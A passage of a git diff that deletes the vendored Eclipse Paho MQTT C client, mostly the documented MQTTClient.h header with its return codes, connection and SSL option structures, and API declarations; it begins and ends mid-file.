-	FUNC_ENTRY;
-	/* a partial write is now complete for a socket - this will be on a publish*/
-
-	MQTTProtocol_checkPendingWrites();
-
-	/* find the client using this socket */
-	if ((found = ListFindItem(handles, &socket, clientSockCompare)) != NULL)
-	{
-		MQTTClients* m = (MQTTClients*)(found->content);
-
-		time(&(m->c->net.lastSent));
-	}
-	FUNC_EXIT;
-}
diff --git a/thirdparty/paho.mqtt.c/src/MQTTClient.h b/thirdparty/paho.mqtt.c/src/MQTTClient.h
deleted file mode 100644
index 9aee563..0000000
--- a/thirdparty/paho.mqtt.c/src/MQTTClient.h
+++ /dev/null
@@ -1,1396 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial API and implementation and/or initial documentation
- *    Ian Craggs, Allan Stockdill-Mander - SSL updates
- *    Ian Craggs - multiple server connection support
- *    Ian Craggs - MQTT 3.1.1 support
- *    Ian Craggs - remove const from eyecatchers #168
- *******************************************************************************/
-
-/**
- * @cond MQTTClient_internal
- * @mainpage MQTT Client Library Internals
- * In the beginning there was one MQTT C client library, MQTTClient, as implemented in MQTTClient.c
- * This library was designed to be easy to use for applications which didn't mind if some of the calls
- * blocked for a while.  For instance, the MQTTClient_connect call will block until a successful
- * connection has completed, or a connection has failed, which could be as long as the "connection
- * timeout" interval, whose default is 30 seconds.
- *
- * However in mobile devices and other windowing environments, blocking on the GUI thread is a bad
- * thing as it causes the user interface to freeze.  Hence a new API, MQTTAsync, implemented
- * in MQTTAsync.c, was devised.  There are no blocking calls in this library, so it is well suited
- * to GUI and mobile environments, at the expense of some extra complexity.
- *
- * Both libraries are designed to be sparing in the use of threads.  So multiple client objects are
- * handled by one or two threads, with a select call in Socket_getReadySocket(), used to determine
- * when a socket has incoming data.  This API is thread safe: functions may be called by multiple application
- * threads, with the exception of ::MQTTClient_yield and ::MQTTClient_receive, which are intended
- * for single threaded environments only.
- *
- * @endcond
- * @cond MQTTClient_main
- * @mainpage MQTT Client library for C
- * &copy; Copyright IBM Corp. 2009, 2017
- *
- * @brief An MQTT client library in C.
- *
- * These pages describe the original more synchronous API which might be
- * considered easier to use.  Some of the calls will block.  For the new
- * totally asynchronous API where no calls block, which is especially suitable
- * for use in windowed environments, see the
- * <a href="../../MQTTAsync/html/index.html">MQTT C Client Asynchronous API Documentation</a>.
- * The MQTTClient API is not thread safe, whereas the MQTTAsync API is.
- *
- * An MQTT client application connects to MQTT-capable servers.
- * A typical client is responsible for collecting information from a telemetry
- * device and publishing the information to the server. It can also subscribe
- * to topics, receive messages, and use this information to control the
- * telemetry device.
- *
- * MQTT clients implement the published MQTT v3 protocol. You can write your own
- * API to the MQTT protocol using the programming language and platform of your
- * choice. This can be time-consuming and error-prone.
- *
- * To simplify writing MQTT client applications, this library encapsulates
- * the MQTT v3 protocol for you. Using this library enables a fully functional
- * MQTT client application to be written in a few lines of code.
- * The information presented here documents the API provided
- * by the MQTT Client library for C.
- *
- * <b>Using the client</b><br>
- * Applications that use the client library typically use a similar structure:
- * <ul>
- * <li>Create a client object</li>
- * <li>Set the options to connect to an MQTT server</li>
- * <li>Set up callback functions if multi-threaded (asynchronous mode)
- * operation is being used (see @ref async).</li>
- * <li>Subscribe to any topics the client needs to receive</li>
- * <li>Repeat until finished:</li>
- *     <ul>
- *     <li>Publish any messages the client needs to</li>
- *     <li>Handle any incoming messages</li>
- *     </ul>
- * <li>Disconnect the client</li>
- * <li>Free any memory being used by the client</li>
- * </ul>
- * Some simple examples are shown here:
- * <ul>
- * <li>@ref pubsync</li>
- * <li>@ref pubasync</li>
- * <li>@ref subasync</li>
- * </ul>
- * Additional information about important concepts is provided here:
- * <ul>
- * <li>@ref async</li>
- * <li>@ref wildcard</li>
- * <li>@ref qos</li>
- * <li>@ref tracing</li>
- * </ul>
- * @endcond
- */
-
-/*
-/// @cond EXCLUDE
-*/
-#if defined(__cplusplus)
- extern "C" {
-#endif
-#if !defined(MQTTCLIENT_H)
-#define MQTTCLIENT_H
-
-#if defined(WIN32) || defined(WIN64)
-  #define DLLImport __declspec(dllimport)
-  #define DLLExport __declspec(dllexport)
-#else
-  #define DLLImport extern
-  #define DLLExport __attribute__ ((visibility ("default")))
-#endif
-
-#include <stdio.h>
-/*
-/// @endcond
-*/
-
-#if !defined(NO_PERSISTENCE)
-#include "MQTTClientPersistence.h"
-#endif
-
-/**
- * Return code: No error. Indicates successful completion of an MQTT client
- * operation.
- */
-#define MQTTCLIENT_SUCCESS 0
-/**
- * Return code: A generic error code indicating the failure of an MQTT client
- * operation.
- */
-#define MQTTCLIENT_FAILURE -1
-
-/* error code -2 is MQTTCLIENT_PERSISTENCE_ERROR */
-
-/**
- * Return code: The client is disconnected.
- */
-#define MQTTCLIENT_DISCONNECTED -3
-/**
- * Return code: The maximum number of messages allowed to be simultaneously
- * in-flight has been reached.
- */
-#define MQTTCLIENT_MAX_MESSAGES_INFLIGHT -4
-/**
- * Return code: An invalid UTF-8 string has been detected.
- */
-#define MQTTCLIENT_BAD_UTF8_STRING -5
-/**
- * Return code: A NULL parameter has been supplied when this is invalid.
- */
-#define MQTTCLIENT_NULL_PARAMETER -6
-/**
- * Return code: The topic has been truncated (the topic string includes
- * embedded NULL characters). String functions will not access the full topic.
- * Use the topic length value to access the full topic.
- */
-#define MQTTCLIENT_TOPICNAME_TRUNCATED -7
-/**
- * Return code: A structure parameter does not have the correct eyecatcher
- * and version number.
- */
-#define MQTTCLIENT_BAD_STRUCTURE -8
-/**
- * Return code: A QoS value that falls outside of the acceptable range (0,1,2)
- */
-#define MQTTCLIENT_BAD_QOS -9
-/**
- * Return code: Attempting SSL connection using non-SSL version of library
- */
-#define MQTTCLIENT_SSL_NOT_SUPPORTED -10
-
-/**
- * Default MQTT version to connect with.  Use 3.1.1 then fall back to 3.1
- */
-#define MQTTVERSION_DEFAULT 0
-/**
- * MQTT version to connect with: 3.1
- */
-#define MQTTVERSION_3_1 3
-/**
- * MQTT version to connect with: 3.1.1
- */
-#define MQTTVERSION_3_1_1 4
-/**
- * Bad return code from subscribe, as defined in the 3.1.1 specification
- */
-#define MQTT_BAD_SUBSCRIBE 0x80
-
-/**
- *  Initialization options
- */
-typedef struct
-{
-	/** The eyecatcher for this structure.  Must be MQTG. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0 */
-	int struct_version;
-	/** 1 = we do openssl init, 0 = leave it to the application */
-	int do_openssl_init;
-} MQTTClient_init_options;
-
-#define MQTTClient_init_options_initializer { {'M', 'Q', 'T', 'G'}, 0, 0 }
-
-/**
- * Global init of mqtt library. Call once on program start to set global behaviour.
- * do_openssl_init - if mqtt library should initialize OpenSSL (1) or rely on the caller to do it before using the library (0)
- */
-DLLExport void MQTTClient_global_init(MQTTClient_init_options* inits);
-
-/**
- * A handle representing an MQTT client. A valid client handle is available
- * following a successful call to MQTTClient_create().
- */
-typedef void* MQTTClient;
-/**
- * A value representing an MQTT message. A delivery token is returned to the
- * client application when a message is published. The token can then be used to
- * check that the message was successfully delivered to its destination (see
- * MQTTClient_publish(),
- * MQTTClient_publishMessage(),
- * MQTTClient_deliveryComplete(),
- * MQTTClient_waitForCompletion() and
- * MQTTClient_getPendingDeliveryTokens()).
- */
-typedef int MQTTClient_deliveryToken;
-typedef int MQTTClient_token;
-
-/**
- * A structure representing the payload and attributes of an MQTT message. The
- * message topic is not part of this structure (see MQTTClient_publishMessage(),
- * MQTTClient_publish(), MQTTClient_receive(), MQTTClient_freeMessage()
- * and MQTTClient_messageArrived()).
- */
-typedef struct
-{
-	/** The eyecatcher for this structure.  must be MQTM. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0 */
-	int struct_version;
-	/** The length of the MQTT message payload in bytes. */
-	int payloadlen;
-	/** A pointer to the payload of the MQTT message. */
-	void* payload;
-	/**
-     * The quality of service (QoS) assigned to the message.
-     * There are three levels of QoS:
-     * <DL>
-     * <DT><B>QoS0</B></DT>
-     * <DD>Fire and forget - the message may not be delivered</DD>
-     * <DT><B>QoS1</B></DT>
-     * <DD>At least once - the message will be delivered, but may be
-     * delivered more than once in some circumstances.</DD>
-     * <DT><B>QoS2</B></DT>
-     * <DD>Once and one only - the message will be delivered exactly once.</DD>
-     * </DL>
-     */
-	int qos;
-	/**
-     * The retained flag serves two purposes depending on whether the message
-     * it is associated with is being published or received.
-     *
-     * <b>retained = true</b><br>
-     * For messages being published, a true setting indicates that the MQTT
-     * server should retain a copy of the message. The message will then be
-     * transmitted to new subscribers to a topic that matches the message topic.
-     * For subscribers registering a new subscription, the flag being true
-     * indicates that the received message is not a new one, but one that has
-     * been retained by the MQTT server.
-     *
-     * <b>retained = false</b> <br>
-     * For publishers, this ndicates that this message should not be retained
-     * by the MQTT server. For subscribers, a false setting indicates this is
-     * a normal message, received as a result of it being published to the
-     * server.
-     */
-	int retained;
-	/**
-      * The dup flag indicates whether or not this message is a duplicate.
-      * It is only meaningful when receiving QoS1 messages. When true, the
-      * client application should take appropriate action to deal with the
-      * duplicate message.
-      */
-	int dup;
-	/** The message identifier is normally reserved for internal use by the
-      * MQTT client and server.
-      */
-	int msgid;
-} MQTTClient_message;
-
-#define MQTTClient_message_initializer { {'M', 'Q', 'T', 'M'}, 0, 0, NULL, 0, 0, 0, 0 }
-
-/**
- * This is a callback function. The client application
- * must provide an implementation of this function to enable asynchronous
- * receipt of messages. The function is registered with the client library by
- * passing it as an argument to MQTTClient_setCallbacks(). It is
- * called by the client library when a new message that matches a client
- * subscription has been received from the server. This function is executed on
- * a separate thread to the one on which the client application is running.
- * @param context A pointer to the <i>context</i> value originally passed to
- * MQTTClient_setCallbacks(), which contains any application-specific context.
- * @param topicName The topic associated with the received message.
- * @param topicLen The length of the topic if there are one
- * more NULL characters embedded in <i>topicName</i>, otherwise <i>topicLen</i>
- * is 0. If <i>topicLen</i> is 0, the value returned by <i>strlen(topicName)</i>
- * can be trusted. If <i>topicLen</i> is greater than 0, the full topic name
- * can be retrieved by accessing <i>topicName</i> as a byte array of length
- * <i>topicLen</i>.
- * @param message The MQTTClient_message structure for the received message.
- * This structure contains the message payload and attributes.
- * @return This function must return a boolean value indicating whether or not
- * the message has been safely received by the client application. Returning
- * true indicates that the message has been successfully handled.
- * Returning false indicates that there was a problem. In this
- * case, the client library will reinvoke MQTTClient_messageArrived() to
- * attempt to deliver the message to the application again.
- */
-typedef int MQTTClient_messageArrived(void* context, char* topicName, int topicLen, MQTTClient_message* message);
-
-/**
- * This is a callback function. The client application
- * must provide an implementation of this function to enable asynchronous
- * notification of delivery of messages. The function is registered with the
- * client library by passing it as an argument to MQTTClient_setCallbacks().
- * It is called by the client library after the client application has
- * published a message to the server. It indicates that the necessary
- * handshaking and acknowledgements for the requested quality of service (see
- * MQTTClient_message.qos) have been completed. This function is executed on a
- * separate thread to the one on which the client application is running.
- * <b>Note:</b>MQTTClient_deliveryComplete() is not called when messages are
- * published at QoS0.
- * @param context A pointer to the <i>context</i> value originally passed to
- * MQTTClient_setCallbacks(), which contains any application-specific context.
- * @param dt The ::MQTTClient_deliveryToken associated with
- * the published message. Applications can check that all messages have been
- * correctly published by matching the delivery tokens returned from calls to
- * MQTTClient_publish() and MQTTClient_publishMessage() with the tokens passed
- * to this callback.
- */
-typedef void MQTTClient_deliveryComplete(void* context, MQTTClient_deliveryToken dt);
-
-/**
- * This is a callback function. The client application
- * must provide an implementation of this function to enable asynchronous
- * notification of the loss of connection to the server. The function is
- * registered with the client library by passing it as an argument to
- * MQTTClient_setCallbacks(). It is called by the client library if the client
- * loses its connection to the server. The client application must take
- * appropriate action, such as trying to reconnect or reporting the problem.
- * This function is executed on a separate thread to the one on which the
- * client application is running.
- * @param context A pointer to the <i>context</i> value originally passed to
- * MQTTClient_setCallbacks(), which contains any application-specific context.
- * @param cause The reason for the disconnection.
- * Currently, <i>cause</i> is always set to NULL.
- */
-typedef void MQTTClient_connectionLost(void* context, char* cause);
-
-/**
- * This function sets the callback functions for a specific client.
- * If your client application doesn't use a particular callback, set the
- * relevant parameter to NULL. Calling MQTTClient_setCallbacks() puts the
- * client into multi-threaded mode. Any necessary message acknowledgements and
- * status communications are handled in the background without any intervention
- * from the client application. See @ref async for more information.
- *
- * <b>Note:</b> The MQTT client must be disconnected when this function is
- * called.
- * @param handle A valid client handle from a successful call to
- * MQTTClient_create().
- * @param context A pointer to any application-specific context. The
- * the <i>context</i> pointer is passed to each of the callback functions to
- * provide access to the context information in the callback.
- * @param cl A pointer to an MQTTClient_connectionLost() callback
- * function. You can set this to NULL if your application doesn't handle
- * disconnections.
- * @param ma A pointer to an MQTTClient_messageArrived() callback
- * function. This callback function must be specified when you call
- * MQTTClient_setCallbacks().
- * @param dc A pointer to an MQTTClient_deliveryComplete() callback
- * function. You can set this to NULL if your application publishes
- * synchronously or if you do not want to check for successful delivery.
- * @return ::MQTTCLIENT_SUCCESS if the callbacks were correctly set,
- * ::MQTTCLIENT_FAILURE if an error occurred.
- */
-DLLExport int MQTTClient_setCallbacks(MQTTClient handle, void* context, MQTTClient_connectionLost* cl,
-									MQTTClient_messageArrived* ma, MQTTClient_deliveryComplete* dc);
-
-
-/**
- * This function creates an MQTT client ready for connection to the
- * specified server and using the specified persistent storage (see
- * MQTTClient_persistence). See also MQTTClient_destroy().
- * @param handle A pointer to an ::MQTTClient handle. The handle is
- * populated with a valid client reference following a successful return from
- * this function.
- * @param serverURI A null-terminated string specifying the server to
- * which the client will connect. It takes the form <i>protocol://host:port</i>.
- * Currently, <i>protocol</i> must be <i>tcp</i> or <i>ssl</i>.
- * For <i>host</i>, you can
- * specify either an IP address or a host name. For instance, to connect to
- * a server running on the local machines with the default MQTT port, specify
- * <i>tcp://localhost:1883</i>.
- * @param clientId The client identifier passed to the server when the
- * client connects to it. It is a null-terminated UTF-8 encoded string.
- * @param persistence_type The type of persistence to be used by the client:
- * <br>
- * ::MQTTCLIENT_PERSISTENCE_NONE: Use in-memory persistence. If the device or
- * system on which the client is running fails or is switched off, the current
- * state of any in-flight messages is lost and some messages may not be
- * delivered even at QoS1 and QoS2.
- * <br>
- * ::MQTTCLIENT_PERSISTENCE_DEFAULT: Use the default (file system-based)
- * persistence mechanism. Status about in-flight messages is held in persistent
- * storage and provides some protection against message loss in the case of
- * unexpected failure.
- * <br>
- * ::MQTTCLIENT_PERSISTENCE_USER: Use an application-specific persistence
- * implementation. Using this type of persistence gives control of the
- * persistence mechanism to the application. The application has to implement
- * the MQTTClient_persistence interface.
- * @param persistence_context If the application uses
- * ::MQTTCLIENT_PERSISTENCE_NONE persistence, this argument is unused and should
- * be set to NULL. For ::MQTTCLIENT_PERSISTENCE_DEFAULT persistence, it
- * should be set to the location of the persistence directory (if set
- * to NULL, the persistence directory used is the working directory).
- * Applications that use ::MQTTCLIENT_PERSISTENCE_USER persistence set this
- * argument to point to a valid MQTTClient_persistence structure.
- * @return ::MQTTCLIENT_SUCCESS if the client is successfully created, otherwise
- * an error code is returned.
- */
-DLLExport int MQTTClient_create(MQTTClient* handle, const char* serverURI, const char* clientId,
-		int persistence_type, void* persistence_context);
-
-/**
- * MQTTClient_willOptions defines the MQTT "Last Will and Testament" (LWT) settings for
- * the client. In the event that a client unexpectedly loses its connection to
- * the server, the server publishes the LWT message to the LWT topic on
- * behalf of the client. This allows other clients (subscribed to the LWT topic)
- * to be made aware that the client has disconnected. To enable the LWT
- * function for a specific client, a valid pointer to an MQTTClient_willOptions
- * structure is passed in the MQTTClient_connectOptions structure used in the
- * MQTTClient_connect() call that connects the client to the server. The pointer
- * to MQTTClient_willOptions can be set to NULL if the LWT function is not
- * required.
- */
-typedef struct
-{
-	/** The eyecatcher for this structure.  must be MQTW. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0 or 1
-		   0 means there is no binary payload option
-	 */
-	int struct_version;
-	/** The LWT topic to which the LWT message will be published. */
-	const char* topicName;
-	/** The LWT payload in string form. */
-	const char* message;
-	/**
-	 * The retained flag for the LWT message (see MQTTClient_message.retained).
-	 */
-	int retained;
-	/**
-	 * The quality of service setting for the LWT message (see
-	 * MQTTClient_message.qos and @ref qos).
-	 */
-	int qos;
-  /** The LWT payload in binary form. This is only checked and used if the message option is NULL */
-	struct
-	{
-  	int len;            /**< binary payload length */
-		const void* data;  /**< binary payload data */
-	} payload;
-} MQTTClient_willOptions;
-
-#define MQTTClient_willOptions_initializer { {'M', 'Q', 'T', 'W'}, 1, NULL, NULL, 0, 0, {0, NULL} }
-
-#define MQTT_SSL_VERSION_DEFAULT 0
-#define MQTT_SSL_VERSION_TLS_1_0 1
-#define MQTT_SSL_VERSION_TLS_1_1 2
-#define MQTT_SSL_VERSION_TLS_1_2 3
-
-/**
-* MQTTClient_sslProperties defines the settings to establish an SSL/TLS connection using the
-* OpenSSL library. It covers the following scenarios:
-* - Server authentication: The client needs the digital certificate of the server. It is included
-*   in a store containting trusted material (also known as "trust store").
-* - Mutual authentication: Both client and server are authenticated during the SSL handshake. In
-*   addition to the digital certificate of the server in a trust store, the client will need its own
-*   digital certificate and the private key used to sign its digital certificate stored in a "key store".
-* - Anonymous connection: Both client and server do not get authenticated and no credentials are needed
-*   to establish an SSL connection. Note that this scenario is not fully secure since it is subject to
-*   man-in-the-middle attacks.
-*/
-typedef struct
-{
-	/** The eyecatcher for this structure.  Must be MQTS */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0, or 1 to enable TLS version selection. */
-	int struct_version;
-
-	/** The file in PEM format containing the public digital certificates trusted by the client. */
-	const char* trustStore;
-
-	/** The file in PEM format containing the public certificate chain of the client. It may also include
-	* the client's private key.
-	*/
-	const char* keyStore;
-
-	/** If not included in the sslKeyStore, this setting points to the file in PEM format containing
-	* the client's private key.
-	*/
-	const char* privateKey;
-	/** The password to load the client's privateKey if encrypted. */
-	const char* privateKeyPassword;
-
-	/**
-	* The list of cipher suites that the client will present to the server during the SSL handshake. For a
-	* full explanation of the cipher list format, please see the OpenSSL on-line documentation:
-	* http://www.openssl.org/docs/apps/ciphers.html#CIPHER_LIST_FORMAT
-	* If this setting is ommitted, its default value will be "ALL", that is, all the cipher suites -excluding
-	* those offering no encryption- will be considered.
-	* This setting can be used to set an SSL anonymous connection ("aNULL" string value, for instance).
-	*/
-	const char* enabledCipherSuites;
-
-    /** True/False option to enable verification of the server certificate **/
-    int enableServerCertAuth;
-
-    /** The SSL/TLS version to use. Specify one of MQTT_SSL_VERSION_DEFAULT (0),
-    * MQTT_SSL_VERSION_TLS_1_0 (1), MQTT_SSL_VERSION_TLS_1_1 (2) or MQTT_SSL_VERSION_TLS_1_2 (3).
-    * Only used if struct_version is >= 1.
-    */
-    int sslVersion;
-
-} MQTTClient_SSLOptions;
-
-#define MQTTClient_SSLOptions_initializer { {'M', 'Q', 'T', 'S'}, 1, NULL, NULL, NULL, NULL, NULL, 1, MQTT_SSL_VERSION_DEFAULT }
-
-/**
- * MQTTClient_connectOptions defines several settings that control the way the
- * client connects to an MQTT server.
- *
- * <b>Note:</b> Default values are not defined for members of
- * MQTTClient_connectOptions so it is good practice to specify all settings.
- * If the MQTTClient_connectOptions structure is defined as an automatic
- * variable, all members are set to random values and thus must be set by the
- * client application. If the MQTTClient_connectOptions structure is defined
- * as a static variable, initialization (in compliant compilers) sets all
- * values to 0 (NULL for pointers). A #keepAliveInterval setting of 0 prevents
- * correct operation of the client and so you <b>must</b> at least set a value
- * for #keepAliveInterval.
- */
-typedef struct
-{
-	/** The eyecatcher for this structure.  must be MQTC. */
-	char struct_id[4];
-	/** The version number of this structure.  Must be 0, 1, 2, 3, 4 or 5.
-	 * 0 signifies no SSL options and no serverURIs
-	 * 1 signifies no serverURIs
-	 * 2 signifies no MQTTVersion
-	 * 3 signifies no returned values
-	 * 4 signifies no binary password option
-	 */
-	int struct_version;
-	/** The "keep alive" interval, measured in seconds, defines the maximum time
-   * that should pass without communication between the client and the server
-   * The client will ensure that at least one message travels across the
-   * network within each keep alive period.  In the absence of a data-related
-	 * message during the time period, the client sends a very small MQTT
-   * "ping" message, which the server will acknowledge. The keep alive
-   * interval enables the client to detect when the server is no longer
-	 * available without having to wait for the long TCP/IP timeout.
-	 */
-	int keepAliveInterval;
-	/**
-   * This is a boolean value. The cleansession setting controls the behaviour
-   * of both the client and the server at connection and disconnection time.
-   * The client and server both maintain session state information. This
-   * information is used to ensure "at least once" and "exactly once"
-   * delivery, and "exactly once" receipt of messages. Session state also
-   * includes subscriptions created by an MQTT client. You can choose to
-   * maintain or discard state information between sessions.
-   *
-   * When cleansession is true, the state information is discarded at
-   * connect and disconnect. Setting cleansession to false keeps the state
-   * information. When you connect an MQTT client application with
-   * MQTTClient_connect(), the client identifies the connection using the
-   * client identifier and the address of the server. The server checks
-   * whether session information for this client
-   * has been saved from a previous connection to the server. If a previous
-   * session still exists, and cleansession=true, then the previous session
-   * information at the client and server is cleared. If cleansession=false,
-   * the previous session is resumed. If no previous session exists, a new
-   * session is started.
-	 */
-	int cleansession;
-	/**
-   * This is a boolean value that controls how many messages can be in-flight
-   * simultaneously. Setting <i>reliable</i> to true means that a published
-   * message must be completed (acknowledgements received) before another
-   * can be sent. Attempts to publish additional messages receive an
-   * ::MQTTCLIENT_MAX_MESSAGES_INFLIGHT return code. Setting this flag to
-	 * false allows up to 10 messages to be in-flight. This can increase
-   * overall throughput in some circumstances.
-	 */
-	int reliable;
-	/**
-   * This is a pointer to an MQTTClient_willOptions structure. If your
-   * application does not make use of the Last Will and Testament feature,
-   * set this pointer to NULL.
-   */
-	MQTTClient_willOptions* will;
-	/**
-   * MQTT servers that support the MQTT v3.1.1 protocol provide authentication
-   * and authorisation by user name and password. This is the user name
-   * parameter.
-   */
-	const char* username;
-	/**
-   * MQTT servers that support the MQTT v3.1.1 protocol provide authentication
-   * and authorisation by user name and password. This is the password
-   * parameter.
-   */
-	const char* password;
-	/**
-   * The time interval in seconds to allow a connect to complete.
-   */
-	int connectTimeout;
-	/**
-	 * The time interval in seconds
-	 */
-	int retryInterval;
-	/**
-   * This is a pointer to an MQTTClient_SSLOptions structure. If your
-   * application does not make use of SSL, set this pointer to NULL.
-   */
-	MQTTClient_SSLOptions* ssl;
-	/**
-	 * The number of entries in the optional serverURIs array. Defaults to 0.
-	 */
-	int serverURIcount;
-	/**
-   * An optional array of null-terminated strings specifying the servers to
-   * which the client will connect. Each string takes the form <i>protocol://host:port</i>.
-   * <i>protocol</i> must be <i>tcp</i> or <i>ssl</i>. For <i>host</i>, you can
-   * specify either an IP address or a host name. For instance, to connect to
-   * a server running on the local machines with the default MQTT port, specify
-   * <i>tcp://localhost:1883</i>.
-   * If this list is empty (the default), the server URI specified on MQTTClient_create()
-   * is used.
-   */
-	char* const* serverURIs;
-	/**
-	 * Sets the version of MQTT to be used on the connect.
-	 * MQTTVERSION_DEFAULT (0) = default: start with 3.1.1, and if that fails, fall back to 3.1
-	 * MQTTVERSION_3_1 (3) = only try version 3.1
-	 * MQTTVERSION_3_1_1 (4) = only try version 3.1.1
-	 */
-	int MQTTVersion;
-	/**
-	 * Returned from the connect when the MQTT version used to connect is 3.1.1
-	 */
-	struct
-	{
-		const char* serverURI;     /**< the serverURI connected to */
-		int MQTTVersion;     /**< the MQTT version used to connect with */
-		int sessionPresent;  /**< if the MQTT version is 3.1.1, the value of sessionPresent returned in the connack */
-	} returned;
-	/**
-   * Optional binary password.  Only checked and used if the password option is NULL
-   */
-  struct {
-  	int len;            /**< binary password length */
-		const void* data;  /**< binary password data */
-	} binarypwd;
-} MQTTClient_connectOptions;
-
-#define MQTTClient_connectOptions_initializer { {'M', 'Q', 'T', 'C'}, 5, 60, 1, 1, NULL, NULL, NULL, 30, 20, NULL, 0, NULL, 0,         {NULL, 0, 0}, {0, NULL} }
-
-/**
-  * MQTTClient_libraryInfo is used to store details relating to the currently used
-  * library such as the version in use, the time it was built and relevant openSSL
-  * options.
-  * There is one static instance of this struct in MQTTClient.c
-  */
-
-typedef struct
-{
-	const char* name;
-	const char* value;
-} MQTTClient_nameValue;
-
-/**
-  * This function returns version information about the library.
-  * no trace information will be returned.
-  * @return an array of strings describing the library.  The last entry is a NULL pointer.
-  */
-DLLExport MQTTClient_nameValue* MQTTClient_getVersionInfo(void);
-
-/**
-  * This function attempts to connect a previously-created client (see
-  * MQTTClient_create()) to an MQTT server using the specified options. If you
-  * want to enable asynchronous message and status notifications, you must call
-  * MQTTClient_setCallbacks() prior to MQTTClient_connect().
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param options A pointer to a valid MQTTClient_connectOptions
-  * structure.
-  * @return ::MQTTCLIENT_SUCCESS if the client successfully connects to the
-  * server. An error code is returned if the client was unable to connect to
-  * the server.
-  * Error codes greater than 0 are returned by the MQTT protocol:<br><br>
-  * <b>1</b>: Connection refused: Unacceptable protocol version<br>
-  * <b>2</b>: Connection refused: Identifier rejected<br>
-  * <b>3</b>: Connection refused: Server unavailable<br>
-  * <b>4</b>: Connection refused: Bad user name or password<br>
-  * <b>5</b>: Connection refused: Not authorized<br>
-  * <b>6-255</b>: Reserved for future use<br>
-  */
-DLLExport int MQTTClient_connect(MQTTClient handle, MQTTClient_connectOptions* options);
-
-/**
-  * This function attempts to disconnect the client from the MQTT
-  * server. In order to allow the client time to complete handling of messages
-  * that are in-flight when this function is called, a timeout period is
-  * specified. When the timeout period has expired, the client disconnects even
-  * if there are still outstanding message acknowledgements.
-  * The next time the client connects to the same server, any QoS 1 or 2
-  * messages which have not completed will be retried depending on the
-  * cleansession settings for both the previous and the new connection (see
-  * MQTTClient_connectOptions.cleansession and MQTTClient_connect()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param timeout The client delays disconnection for up to this time (in
-  * milliseconds) in order to allow in-flight message transfers to complete.
-  * @return ::MQTTCLIENT_SUCCESS if the client successfully disconnects from
-  * the server. An error code is returned if the client was unable to disconnect
-  * from the server
-  */
-DLLExport int MQTTClient_disconnect(MQTTClient handle, int timeout);
-
-/**
-  * This function allows the client application to test whether or not a
-  * client is currently connected to the MQTT server.
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @return Boolean true if the client is connected, otherwise false.
-  */
-DLLExport int MQTTClient_isConnected(MQTTClient handle);
-
-
-/* Subscribe is synchronous.  QoS list parameter is changed on return to granted QoSs.
-   Returns return code, MQTTCLIENT_SUCCESS == success, non-zero some sort of error (TBD) */
-
-/**
-  * This function attempts to subscribe a client to a single topic, which may
-  * contain wildcards (see @ref wildcard). This call also specifies the
-  * @ref qos requested for the subscription
-  * (see also MQTTClient_subscribeMany()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param topic The subscription topic, which may include wildcards.
-  * @param qos The requested quality of service for the subscription.
-  * @return ::MQTTCLIENT_SUCCESS if the subscription request is successful.
-  * An error code is returned if there was a problem registering the
-  * subscription.
-  */
-DLLExport int MQTTClient_subscribe(MQTTClient handle, const char* topic, int qos);
-
-/**
-  * This function attempts to subscribe a client to a list of topics, which may
-  * contain wildcards (see @ref wildcard). This call also specifies the
-  * @ref qos requested for each topic (see also MQTTClient_subscribe()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param count The number of topics for which the client is requesting
-  * subscriptions.
-  * @param topic An array (of length <i>count</i>) of pointers to
-  * topics, each of which may include wildcards.
-  * @param qos An array (of length <i>count</i>) of @ref qos
-  * values. qos[n] is the requested QoS for topic[n].
-  * @return ::MQTTCLIENT_SUCCESS if the subscription request is successful.
-  * An error code is returned if there was a problem registering the
-  * subscriptions.
-  */
-DLLExport int MQTTClient_subscribeMany(MQTTClient handle, int count, char* const* topic, int* qos);
-
-/**
-  * This function attempts to remove an existing subscription made by the
-  * specified client.
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param topic The topic for the subscription to be removed, which may
-  * include wildcards (see @ref wildcard).
-  * @return ::MQTTCLIENT_SUCCESS if the subscription is removed.
-  * An error code is returned if there was a problem removing the
-  * subscription.
-  */
-DLLExport int MQTTClient_unsubscribe(MQTTClient handle, const char* topic);
-
-/**
-  * This function attempts to remove existing subscriptions to a list of topics
-  * made by the specified client.
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param count The number subscriptions to be removed.
-  * @param topic An array (of length <i>count</i>) of pointers to the topics of
-  * the subscriptions to be removed, each of which may include wildcards.
-  * @return ::MQTTCLIENT_SUCCESS if the subscriptions are removed.
-  * An error code is returned if there was a problem removing the subscriptions.
-  */
-DLLExport int MQTTClient_unsubscribeMany(MQTTClient handle, int count, char* const* topic);
-
-/**
-  * This function attempts to publish a message to a given topic (see also
-  * MQTTClient_publishMessage()). An ::MQTTClient_deliveryToken is issued when
-  * this function returns successfully. If the client application needs to
-  * test for succesful delivery of QoS1 and QoS2 messages, this can be done
-  * either asynchronously or synchronously (see @ref async,
-  * ::MQTTClient_waitForCompletion and MQTTClient_deliveryComplete()).
-  * @param handle A valid client handle from a successful call to
-  * MQTTClient_create().
-  * @param topicName The topic associated with this message.
-  * @param payloadlen The length of the payload in bytes.
-  * @param payload A pointer to the byte array payload of the message.
-  * @param qos The @ref qos of the message.
-  * @param retained The retained flag for the message.
-  * @param dt A pointer to an ::MQTTClient_deliveryToken. This is populated
-  * with a token representing the message when the function returns
-  * successfully. If your application does not use delivery tokens, set this
-  * argument to NULL.
-  * @return ::MQTTCLIENT_SUCCESS if the message is accepted for publication.
